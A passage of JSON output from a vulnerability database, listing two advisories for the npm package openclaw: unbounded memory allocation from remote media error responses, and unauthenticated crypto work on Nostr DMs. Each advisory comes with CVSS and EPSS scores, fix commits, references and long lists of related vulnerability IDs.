oversized snippets before surfacing failure text.\n\nOpenClaw thanks @YLChen-007 for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35633","reference_id":"","reference_type":"","scores":[{"value":"0.00157","scoring_system":"epss","scoring_elements":"0.36209","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00157","scoring_system":"epss","scoring_elements":"0.36246","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00157","scoring_system":"epss","scoring_elements":"0.36238","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35633"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvss
v4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/
UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:09:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"},{"reference_url":"https://github.com/advisories/GHSA-4qwc-c7g9-4xcw","reference_id":"GHSA-4qwc-c7g9-4xcw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4qwc-c7g9-4xcw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vul
nerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vul
nerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vul
nerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vul
nerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35633","GHSA-4q
wc-c7g9-4xcw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-816s-45wb-83ce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90791?format=json","vulnerability_id":"VCID-849r-t5j1-vue8","summary":"OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n## Summary\nNostr inbound DM handling could perform crypto and dispatch work before sender and pairing policy enforcement, enabling unauthorized pre-auth computation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `1ee9611079e81b9122f4bed01abb3d9f56206c77`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nostr/src/channel.ts now performs authorization before decrypting and dispatching inbound DM content.\n- extensions/nostr/src/nostr-bus.ts adds pre-crypto authorization, size, and rate guardrails before expensive decrypt work.\n\nOpenClaw thanks @kuranikaran for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35627","reference_id":"","reference_type":"","scores":[{"value":"0.00122","scoring_system":"epss","scoring_elements":"0.30889","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00122","scoring_system":"epss","scoring_elements":"0.30923","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00122","scoring_system":"epss","scoring_elements":"0.30955","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35627"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvss
v4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR
:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"},{"reference_url":"https://github.com/advisories/GHSA-65h8-27jh-q8wv","reference_id":"GHSA-65h8-27jh-q8wv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-65h8-27jh-q8wv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"}
,{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"}
